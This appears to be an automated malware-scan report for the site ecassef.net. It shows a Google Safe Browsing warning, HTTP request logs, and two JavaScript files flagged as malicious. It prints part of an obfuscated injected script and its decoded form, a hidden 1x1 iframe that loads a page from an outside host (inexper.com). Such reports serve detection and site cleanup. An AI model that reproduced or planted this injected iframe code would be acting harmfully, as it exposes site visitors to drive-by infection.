Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ecassef.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://ecassef.net/ | 200 OK Content-Length: 3489 Content-Type: text/html | clean |
http://ecassef.net/res/x5engine.js | 404 Not Found Content-Length: 6037 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var DepanNegw=window;var DexeTelae=-44;DexeTelae+=45;XayeZebah='nedajemac';var GaDemee='e5vfqaIVblI5'.replace(/[5fqIVbI5]/g, '');ZavevTa='fazemezarawaseb';var MezRai=parseInt;var DayahDet='zafezed lacet cetexet jevecakemahamaha febenep cafa fezebefe yelaxa xejarer hejefaqazedeka kebeneh petaqe zevexej jenewabahegehar jabevame bayap def vasefezetevamer nefelaba sezaxewe qajeqeme wet reyeqer magemefele xelawece denew jafelev haweqa kel vatabaser mag ve ...[2396 bytes skipped]... Decoded script: document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://inexper.com/count19.php"></iframe>') document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://inexper.com/count19.php"></iframe>') <iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://inexper.com/count19.php"></iframe> Antivirus reports:
| ||
http://ecassef.net/test404page.js | 404 Not Found Content-Length: 6037 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var DepanNegw=window;var DexeTelae=-44;DexeTelae+=45;XayeZebah='nedajemac';var GaDemee='e5vfqaIVblI5'.replace(/[5fqIVbI5]/g, '');ZavevTa='fazemezarawaseb';var MezRai=parseInt;var DayahDet='zafezed lacet cetexet jevecakemahamaha febenep cafa fezebefe yelaxa xejarer hejefaqazedeka kebeneh petaqe zevexej jenewabahegehar jabevame bayap def vasefezetevamer nefelaba sezaxewe qajeqeme wet reyeqer magemefele xelawece denew jafelev haweqa kel vatabaser mag ve ...[2396 bytes skipped]... Decoded script: document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://inexper.com/count19.php"></iframe>') document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://inexper.com/count19.php"></iframe>') <iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://inexper.com/count19.php"></iframe> Antivirus reports:
| ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ecassef.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 Mar 2015 02:04:07 GMT
Accept-Ranges: bytes
ETag: "528322c9-da1"
Server: nginx
Vary: Accept-Encoding
Content-Length: 3489
Content-Type: text/html
Last-Modified: Wed, 13 Nov 2013 06:57:13 GMT
X-Powered-By: PleskLin
...3489 bytes of data.
GET / HTTP/1.1
Host: ecassef.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 Mar 2015 02:04:07 GMT
Accept-Ranges: bytes
ETag: "528322c9-da1"
Server: nginx
Vary: Accept-Encoding
Content-Length: 3489
Content-Type: text/html
Last-Modified: Wed, 13 Nov 2013 06:57:13 GMT
X-Powered-By: PleskLin
...3489 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ecassef.net
Referer: http://www.google.com/search?q=ecassef.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ecassef.net
Referer: http://www.google.com/search?q=ecassef.net
Result:
The result is similar to the first query. There are no suspicious redirects found.